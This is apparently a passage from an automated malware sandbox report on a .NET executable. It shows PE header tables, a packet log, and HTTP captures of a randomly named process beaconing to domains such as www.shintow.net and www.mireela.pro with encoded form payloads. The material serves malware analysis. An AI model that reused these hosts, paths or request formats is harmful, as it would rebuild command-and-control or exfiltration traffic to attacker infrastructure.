                                                                                            add byte ptr [esi+00h], cl
                                                                                            inc esi
                                                                                            add byte ptr [edi+00h], cl
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            mov ebp, 00000004h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbbf9d | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbc000 | 0x630 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb9e80 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb9ff8 | 0xba000 | 1a9f715b34c7cc3449be736356de55cb | False | 0.9548208585349462 | data | 7.948212011277769 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xbc000 | 0x630 | 0x800 | 83e6aca2e6b5420b03b362849b0c1bda | False | 0.34033203125 | data | 3.481877415160437 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbe000 | 0xc | 0x200 | bc9dccfa8ef4c61ad1a444c44730566e | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xbc090 | 0x3a0 | data | | | 0.4224137931034483
RT_MANIFEST | 0xbc440 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain
                                                                                            Oct 24, 2024 15:30:47.327163935 CEST4999980192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:51.548084974 CEST8049999162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:51.553428888 CEST4999980192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:51.582247972 CEST4999980192.168.2.5162.241.63.77
                                                                                            Oct 24, 2024 15:30:51.587678909 CEST8049999162.241.63.77192.168.2.5
                                                                                            Oct 24, 2024 15:30:56.743186951 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:56.748634100 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:56.748698950 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:56.762798071 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:56.768256903 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455123901 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455192089 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455228090 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455262899 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455296993 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:57.455301046 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455355883 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.455482960 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:57.455629110 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:57.456721067 CEST8050000141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:57.456845999 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:58.272471905 CEST5000080192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:59.291122913 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:59.296582937 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:30:59.297559977 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:59.309420109 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:30:59.314858913 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.032210112 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.032474995 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.032490015 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.032527924 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:00.032597065 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.032639980 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:00.032774925 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.033045053 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.033091068 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:00.035805941 CEST8050001141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:00.035857916 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:00.819188118 CEST5000180192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:01.837855101 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:01.843352079 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:01.843473911 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:01.854455948 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:01.859929085 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:01.859941006 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537142992 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537198067 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537235975 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537244081 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:02.537261009 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537282944 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537298918 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.537306070 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:02.537363052 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:02.538166046 CEST8050002141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:02.538218975 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:03.381779909 CEST5000280192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:04.401082993 CEST5000380192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:04.406733036 CEST8050003141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:04.406817913 CEST5000380192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:04.416120052 CEST5000380192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:04.421596050 CEST8050003141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:05.098718882 CEST8050003141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:05.101999044 CEST8050003141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:05.102102995 CEST5000380192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:05.102935076 CEST5000380192.168.2.5141.193.213.11
                                                                                            Oct 24, 2024 15:31:05.108267069 CEST8050003141.193.213.11192.168.2.5
                                                                                            Oct 24, 2024 15:31:10.135768890 CEST5000480192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:10.142676115 CEST805000476.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:10.142744064 CEST5000480192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:10.153763056 CEST5000480192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:10.159790039 CEST805000476.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:10.771032095 CEST805000476.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:10.771125078 CEST5000480192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:11.662992001 CEST5000480192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:11.669409990 CEST805000476.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:12.682164907 CEST5000580192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:12.687588930 CEST805000576.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:12.687678099 CEST5000580192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:12.700344086 CEST5000580192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:12.705724001 CEST805000576.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:13.323909998 CEST805000576.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:13.325212955 CEST5000580192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:14.209677935 CEST5000580192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:14.218564987 CEST805000576.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:15.230971098 CEST5000680192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:15.238051891 CEST805000676.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:15.238189936 CEST5000680192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:15.250274897 CEST5000680192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:15.256104946 CEST805000676.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:15.256634951 CEST805000676.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:15.868230104 CEST805000676.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:15.868400097 CEST5000680192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:16.756637096 CEST5000680192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:16.762384892 CEST805000676.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:17.815311909 CEST5000780192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:17.820756912 CEST805000776.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:17.820924044 CEST5000780192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:17.829683065 CEST5000780192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:17.835061073 CEST805000776.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:18.448698997 CEST805000776.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:18.449251890 CEST805000776.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:18.449306965 CEST5000780192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:18.452033997 CEST5000780192.168.2.576.223.67.189
                                                                                            Oct 24, 2024 15:31:18.457467079 CEST805000776.223.67.189192.168.2.5
                                                                                            Oct 24, 2024 15:31:23.482074976 CEST5000880192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:23.487453938 CEST80500083.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:23.491017103 CEST5000880192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:23.502937078 CEST5000880192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:23.508279085 CEST80500083.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:24.130917072 CEST80500083.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:24.130995035 CEST5000880192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:25.006751060 CEST5000880192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:25.012254000 CEST80500083.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:26.027913094 CEST5000980192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:26.033494949 CEST80500093.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:26.033588886 CEST5000980192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:26.051460028 CEST5000980192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:26.056977987 CEST80500093.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:26.671109915 CEST80500093.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:26.671195984 CEST5000980192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:27.553389072 CEST5000980192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:27.558913946 CEST80500093.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:28.577406883 CEST5001080192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:28.582866907 CEST80500103.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:28.582963943 CEST5001080192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:28.599558115 CEST5001080192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:28.605012894 CEST80500103.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:28.605118990 CEST80500103.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:29.232697010 CEST80500103.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:29.232800007 CEST5001080192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:30.144411087 CEST5001080192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:30.150085926 CEST80500103.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:31.150355101 CEST5001180192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:31.155874014 CEST80500113.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:31.157140017 CEST5001180192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:31.165919065 CEST5001180192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:31.171340942 CEST80500113.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:31.774564028 CEST80500113.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:31.775322914 CEST80500113.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:31.777250051 CEST5001180192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:31.781608105 CEST5001180192.168.2.53.33.130.190
                                                                                            Oct 24, 2024 15:31:31.787064075 CEST80500113.33.130.190192.168.2.5
                                                                                            Oct 24, 2024 15:31:36.808152914 CEST5001280192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:36.813730001 CEST8050012172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:36.813862085 CEST5001280192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:36.828985929 CEST5001280192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:36.834563017 CEST8050012172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:37.554816008 CEST8050012172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:37.566860914 CEST8050012172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:37.569678068 CEST5001280192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:38.334682941 CEST5001280192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:39.353420019 CEST5001380192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:39.358956099 CEST8050013172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:39.359054089 CEST5001380192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:39.374583960 CEST5001380192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:39.379934072 CEST8050013172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:40.068412066 CEST8050013172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:40.070826054 CEST8050013172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:40.070890903 CEST5001380192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:40.882029057 CEST5001380192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:41.901237011 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:41.907269955 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:41.907561064 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:41.922687054 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:41.928319931 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:41.928379059 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:42.643667936 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:42.643974066 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:42.644030094 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:42.646450996 CEST8050014172.67.177.220192.168.2.5
                                                                                            Oct 24, 2024 15:31:42.646507978 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:43.428459883 CEST5001480192.168.2.5172.67.177.220
                                                                                            Oct 24, 2024 15:31:44.447395086 CEST5001580192.168.2.5172.67.177.220
Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49866 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 3648 | Process: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
Timestamp: Oct 24, 2024 15:29:41.512497902 CEST | Bytes transferred: 411 | Direction: OUT | Data:
GET /qq33/?pZxtux=i6Dk+UJVjxglEXs09Tl/1hzZ7yI7sWOV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnhTwiButew2EOfjMP80SRQHDkyyZg6sD1yMmsAnC5II4onw==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.ila.beauty
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Timestamp: Oct 24, 2024 15:29:42.174063921 CEST | Bytes transferred: 403 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Thu, 24 Oct 2024 13:29:42 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 263
                                                                                            Connection: close
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pZxtux=i6Dk+UJVjxglEXs09Tl/1hzZ7yI7sWOV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnhTwiButew2EOfjMP80SRQHDkyyZg6sD1yMmsAnC5II4onw==&C6=EXkTb"}</script></head></html>


Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49949 | Destination IP: 142.250.185.115 | Destination Port: 80 | PID: 3648 | Process: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
Timestamp: Oct 24, 2024 15:29:57.283437014 CEST | Bytes transferred: 673 | Direction: OUT | Data:
POST /ow7i/ HTTP/1.1
                                                                                            Host: www.shintow.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.shintow.net
                                                                                            Referer: http://www.shintow.net/ow7i/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=O4lQUcptNkK6uc30nUaYenRNKn8/rXmd5gmepEJ43qmdOKc/m0CLAckiSVuPA+R2gBK+pldlunxRCXWfHRn1QOuF7vmGkauLpatRfHuM1XbkS4hbK6ioDLHs9xqdgLdBzLZFZQcBZcTNe1I/pj9PgAq8S4qr6jhFG/F3XEkZwLMdQ+Q1cG5aRrWR4dP/JT51EbDqDPA=
Timestamp: Oct 24, 2024 15:29:58.218060017 CEST | Bytes transferred: 401 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 24 Oct 2024 13:29:58 GMT
                                                                                            Location: https://www.shintow.net/ow7i/
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Connection: close


Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49964 | Destination IP: 142.250.185.115 | Destination Port: 80 | PID: 3648 | Process: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
Timestamp: Oct 24, 2024 15:29:59.823642969 CEST | Bytes transferred: 693 | Direction: OUT | Data:
POST /ow7i/ HTTP/1.1
                                                                                            Host: www.shintow.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.shintow.net
                                                                                            Referer: http://www.shintow.net/ow7i/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Ascii: pZxtux=O4lQUcptNkK6u4L0l3iYfHRMFH8/h3mZ5gqepF9o2ZCdOoU/3FCLDckia1vLdOR9gBPBpg9lunlRCSSfHmz0CuuDyPmIq6uLpatRfGKi1WzkSJRbLbirALHvthqdrrdFzLZ7ZUdJZerNe2c/si9Q1wqAfYrJ+SMBENY5QWRxkI0rRIhfGkxyCL6poOHIYjYce4TadYWrT5878NwWx/rHQxfnS6uh
Timestamp: Oct 24, 2024 15:30:00.762973070 CEST | Bytes transferred: 401 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 24 Oct 2024 13:30:00 GMT
                                                                                            Location: https://www.shintow.net/ow7i/
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Connection: close


Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49978 | Destination IP: 142.250.185.115 | Destination Port: 80 | PID: 3648 | Process: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
Timestamp: Oct 24, 2024 15:30:02.413759947 CEST | Bytes transferred: 1710 | Direction: OUT | Data:
POST /ow7i/ HTTP/1.1
                                                                                            Host: www.shintow.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.shintow.net
                                                                                            Referer: http://www.shintow.net/ow7i/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:03.346499920 CEST | 401 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 24 Oct 2024 13:30:03 GMT
                                                                                            Location: https://www.shintow.net/ow7i/
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            4 | 192.168.2.5 | 49986 | 142.250.185.115 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:04.961354017 CEST | 412 | OUT | GET /ow7i/?pZxtux=D6NwXqVIZVbqudPbukfKSXslB0cDplrj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GBPPQtbW1nqz4pZ5COE7r30blXJdgErW3TYP6jwHTnZcx3A==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.shintow.net
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:30:05.905431032 CEST | 554 | IN | HTTP/1.1 301 Moved Permanently
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 24 Oct 2024 13:30:05 GMT
                                                                                            Location: https://www.shintow.net/ow7i/?pZxtux=D6NwXqVIZVbqudPbukfKSXslB0cDplrj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GBPPQtbW1nqz4pZ5COE7r30blXJdgErW3TYP6jwHTnZcx3A%3D%3D&C6=EXkTb
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            5 | 192.168.2.5 | 49987 | 69.57.163.227 | 80 | 3648 | C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Oct 24, 2024 15:30:11.073523045 CEST | 673 | OUT | POST /mdol/ HTTP/1.1
                                                                                            Host: www.mireela.pro
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mireela.pro
                                                                                            Referer: http://www.mireela.pro/mdol/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
